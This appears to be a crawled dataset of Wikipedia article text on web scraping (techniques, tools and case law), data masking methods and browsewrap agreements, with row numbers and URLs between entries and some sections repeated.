outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
538 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-6 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
539 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_masking | Data masking or data obfuscation is the process of modifying sensitive data in such a way that it is of no or little value to unauthorized intruders while still being usable by software or authorized personnel. Data masking can also be referred as anonymization, or tokenization, depending on different context. The main reason to mask data is to protect information that is classified as personally identifiable information, or mission critical data. However, the data must remain usable for the purposes of undertaking valid test cycles. It must also look real and appear consistent. It is more common to have masking applied to data that is represented outside of a corporate production system. In other words, where data is needed for the purpose of application development, building program extensions and conducting various test cycles. It is common practice in enterprise computing to take data from the production systems to fill the data component, required for these non-production environments. However, this practice is not always restricted to non-production environments. In some organizations, data that appears on terminal screens to call center operators may have masking dynamically applied based on user security permissions (e.g. preventing call center operators from viewing credit card numbers in billing systems). The primary concern from a corporate governance perspective 1 is that personnel conducting work in these non-production environments are not always security cleared to operate with the information contained in the production data. This practice represents a security hole where data can be copied by unauthorized personnel, and security measures associated with standard production level controls can be easily bypassed. This represents an access point for a data security breach. Data involved in any data masking or obfuscation must remain meaningful at several levels: Substitution is one of the most effective methods of applying data masking and being able to preserve the authentic look and feel of the data records. It allows the masking to be performed in such a manner that another authentic-looking value can be substituted for the existing value. 2 There are several data field types where this approach provides optimal benefit in disguising the overall data subset as to whether or not it is a masked data set. For example, if dealing with source data which contains customer records, real life surname or first name can be randomly substituted from a supplied or customised look up file. If the first pass of the substitution allows for applying a male first name to all first names, then the second pass would need to allow for applying a female first name to all first names where gender equals "F. Using this approach we could easily maintain the gender mix within the data structure, apply anonymity to the data records but also maintain a realistic looking database, which could not easily be identified as a database consisting of masked data. This substitution method needs to be applied for many of the fields that are in database structures across the world, such as telephone numbers, zip codes and postcodes, as well as credit card numbers and other card type numbers like Social Security numbers and Medicare numbers where these numbers actually need to conform to a checksum test of the Luhn algorithm. In most cases, the substitution files will need to be fairly extensive so having large substitution datasets as well the ability to apply customized data substitution sets should be a key element of the evaluation criteria for any data masking solution. The shuffling method is a very common form of data obfuscation. It is similar to the substitution method but it derives the substitution set from the same column of data that is being masked. In very simple terms, the data is randomly shuffled within the column. 3 However, if used in isolation, anyone with any knowledge of the original data can then apply a "what if" scenario to the data set and then piece back together a real identity. The shuffling method is also open to being reversed if the shuffling algorithm can be deciphered. citation needed Data shuffling overcomes reservations about using perturbed or modified confidential data because it retains all the desirable properties of perturbation while performing better than other masking techniques in both data utility and disclosure risk. 3 Shuffling, however, has some real strengths in certain areas. If for instance, the end of year figures for financial information in a test data base, one can mask the names of the suppliers and then shuffle the value of the accounts throughout the masked database. It is highly unlikely that anyone, even someone with intimate knowledge of the original data could derive a true data record back to its original values. The numeric variance method is very useful for applying to financial and date driven information fields. Effectively, a method utilising this manner of masking can still leave a meaningful range in a financial data set such as payroll. If the variance applied is around 10% then it is still a very meaningful data set in terms of the ranges of salaries that are paid to the recipients. The same also applies to the date information. If the overall data set needs to retain demographic and actuarial data integrity, then applying a random numeric variance of 120 days to date fields would preserve the date distribution, but it would still prevent traceability back to a known entity based on their known actual date or birth or a known date value for whatever record is being masked. Encryption is often the most complex approach to solving the data masking problem. The encryption algorithm often requires that a "key" be applied to view the data based on user rights. This often sounds like the best solution, but in practice the key may then be given out to personnel without the proper rights to view the data. This then defeats the purpose of the masking exercise. Old databases may then get copied with the original credentials of the supplied key and the same uncontrolled problem lives on. Recently, the problem of encrypting data while preserving the properties of the entities got recognition and a newly acquired interest among the vendors and academia. New challenge gave birth to algorithms performing format-preserving encryption. These are based on the accepted Advanced Encryption Standard (AES) algorithmic mode recognized by NIST. 4 Sometimes a very simplistic approach to masking is adopted through applying a null value to a particular field. The null value approach is really only useful to prevent visibility of the data element. In almost all cases, it lessens the degree of data integrity that is maintained in the masked data set. It is not a realistic value and will then fail any application logic validation that may have been applied in the front end software that is in the system under test. It also highlights to anyone that wishes to reverse engineer any of the identity data that data masking has been applied to some degree on the data set. Character scrambling or masking out of certain fields is also another simplistic yet very effective method of preventing sensitive information to be viewed. It is really an extension of the previous method of nulling out, but there is a greater emphasis on keeping the data real and not fully masked all together. This is commonly applied to credit card data in production systems. For instance, an operator at a call centre might bill an item to a customer's credit card. They then quote a billing reference to the card with the last 4 digits of XXXX XXXX xxxx 6789. As an operator they can only see the last 4 digits of the card number, but once the billing system passes the customer's details for charging, the full number is revealed to the payment gateway systems. This system is not very effective for test systems, but it is very useful for the billing scenario detailed above. It is also commonly known as a dynamic data masking method. 5 6 Additional rules can also be factored into any masking solution regardless of how the masking methods are constructed. Product agnostic white papers 7 are a good source of information for exploring some of the more common complex requirements for enterprise masking solutions, which include row internal synchronization rules, table internal synchronization rules and table 8 to Table Synchronization Rules. Data masking is tightly coupled with building test data. Two major types of data masking are static and on-the-fly data masking. Static data masking is usually performed on the golden copy of the database, but can also be applied to values in other sources, including files. In DB environments, production database administrators will typically load table backups to a separate environment, reduce the dataset to a subset that holds the data necessary for a particular round of testing (a technique called "subsetting"), apply data masking rules while data is in stasis, apply necessary code changes from source control, and or and push data to desired environment. 9 Deterministic masking is the process of replacing a value in a column with the same value whether in the same row, the same table, the same database schema and between instances servers database types. Example: A database has multiple tables, each with a column that has first names. With deterministic masking the first name will always be replaced with the same value “Lynne” will always become “Denise” wherever “Lynne” may be in the database. 10 There are also alternatives to the static data masking that rely on stochastic perturbations of the data that preserve some of the statistical properties of the original data. Examples of statistical data obfuscation methods include differential privacy 11 and the DataSifter method. 12 On-the-fly data masking 13 happens in the process of transferring data from environment to environment without data touching the disk on its way. The same technique is applied to "Dynamic Data Masking" but one record at a time. This type of data masking is most useful for environments that do continuous deployments as well as for heavily integrated applications. Organizations that employ continuous deployment or continuous delivery practices do not have the time necessary to create a backup and load it to the golden copy of the database. Thus, continuously sending smaller subsets (deltas) of masked testing data from production is important. In heavily integrated applications, developers get feeds from other production systems at the very onset of development and masking of these feeds is either overlooked and not budgeted until later, making organizations non-compliant. Having on-the-fly data masking in place becomes essential. Dynamic data masking is similar to on-the-fly data masking, but it differs in the sense that on-the-fly data masking is about copying data from one source to another source so that the latter can be shared. Dynamic data masking happens at runtime, dynamically, and on-demand so that there doesn't need to be a second data source where to store the masked data dynamically. Dynamic data masking enables several scenarios, many of which revolve around strict privacy regulations e.g. the Singapore Monetary Authority or the Privacy regulations in Europe. Dynamic data masking is attribute-based and policy-driven. Policies include: Dynamic data masking can also be used to encrypt or decrypt values on the fly especially when using format-preserving encryption. Several standards have emerged in recent years to implement dynamic data filtering and masking. For instance, XACML policies can be used to mask data inside databases. There are six possible technologies to apply Dynamic data masking: In latest years, organizations develop their new applications in the cloud more and more often, regardless of whether final applications will be hosted in the cloud or on- premises. The cloud solutions as of now allow organizations to use infrastructure as a service, platform as a service, and software as a service. There are various modes of creating test data and moving it from on-premises databases to the cloud, or between different environments within the cloud. Dynamic Data Masking becomes even more critical in cloud when customers need to protecting PII data while relying on cloud providers to administer their databases. Data masking invariably becomes the part of these processes in the systems development life cycle (SDLC) as the development environments' service-level agreements (SLAs) are usually not as stringent as the production environments' SLAs regardless of whether application is hosted in the cloud or on-premises. |
540 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Browse_wrap | Browsewrap (also browserwrap or browse-wrap license) is a term used in Internet law to refer to a contract or license agreement covering access to or use of materials on a web site or downloadable product. In a browse-wrap agreement, the terms and conditions of use for a website or other downloadable product are posted on the website, typically as a hyperlink at the bottom of the screen. 1 2 Unlike a clickwrap agreement, where the user must manifest assent to the terms and conditions by clicking on an "I agree" box, a browse-wrap agreement does not require this type of express manifestation of assent. 1 Rather, a web-site user purportedly gives their consent simply by using the product — such as by entering the website or downloading software. 1 Browse-wrap agreements, like clickwrap agreements, derive their name by analogy to the "shrink wrap agreements" included inside the sealed packaging of tangible products, where one can not see the agreement until the product has been purchased or used. 3 Courts that have ruled on the issue have held that the validity of a browse-wrap agreement primarily depends on whether a website user has actual or constructive notice of the terms and conditions prior to using the website or other product. 1 In 2000, in Ticketmaster v. Tickets.com, the court looked at a breach of contract claim where the terms and conditions were situated at the bottom of the home page in "small print. 4 The court ruled for the defendant in this case but did allow Ticketmaster to replead if there were facts showing that the defendant had knowledge of the terms and implicitly agreed to them. In 2002, in Specht v. Netscape, the Second Circuit Court of Appeals looked at the enforceability of a browse-wrap contract entered into on the Netscape website. 3 Users of the site were urged to download free software available on the site by clicking on a tinted button labeled "download". 3 : 22 Only if a user scrolled down the page to the next screen did he come upon an invitation to review the full terms of the program's license agreement, available by hyperlink. 3 : 23 The plaintiffs, who had not seen the agreement, downloaded the software and then were later sued for violations of federal privacy and computer fraud statutes arising from the use of the software. 3 : 23 25 The Second Circuit then noted that an essential ingredient to contract formation is the mutual manifestation of assent. 3 : 29 The court found that "a consumer's clicking on a download button does not communicate assent to contractual terms if the offer did not make clear to the consumer that clicking on the download button would signify assent to those terms. 3 : 29 30 Because the plaintiffs were not put on notice of these terms they were not bound by them. 3 : 30 32 In 2005, the Illinois Appellate Court ruled in favor of a browse-wrap agreement in Hubbert v. Dell Corp. In this case consumers of Dell products were repeatedly shown the words "All sales are subject to Dell's Term s and Conditions of Sale", including a conspicuous hyperlink, over a series of pages. The court found that this repeated exposure and visual effect would put a reasonable person on notice of the "terms and conditions". 5 In contrast, in 2014, the United States Court of Appeals for the Ninth Circuit ruled in Nguyen v. Barnes Noble, Inc. that Barnes Noble's 2011 Terms of Use agreement, presented in a browse-wrap manner via hyperlinks alone, was not enforceable since it failed to offer users reasonable notice of the terms. 6 Similarly, in In re Zappos.com, Inc., Customer Data Security Breach Litigation, the United States District Court for the District of Nevada ruled against Zappos.com's browsewrap terms of use, describing that its presentation was not prominent, and that no reasonable user would have read the agreement. 7 A browse-wrap agreement can be formed by use of a web page or a hyperlink or small disclaimer on the page. It may only be enforced if the browsing user assents to it. For assent to occur the browse-wrap agreement should be conspicuous, state that there is an agreement, and provide where it can be located. Courts examine the enforceability of browse-wrap agreements on a case-by-case basis, and there are no "bright-line" rules on whether a given agreement is sufficiently conspicuous. However, based on Specht, some practitioners believe that the icon for the terms of use agreement be placed in the upper left-hand quadrant of the homepage and that all visitors be channeled through the homepage. The reason for this suggestion is that the court will take judicial notice of the fact that all Internet pages open from the upper left-hand quadrant, thus the defendant must overcome the presumption that the icon was viewed. Without this presumption, the plaintiff has the burden of proving the defendant did see the icon. 8 |
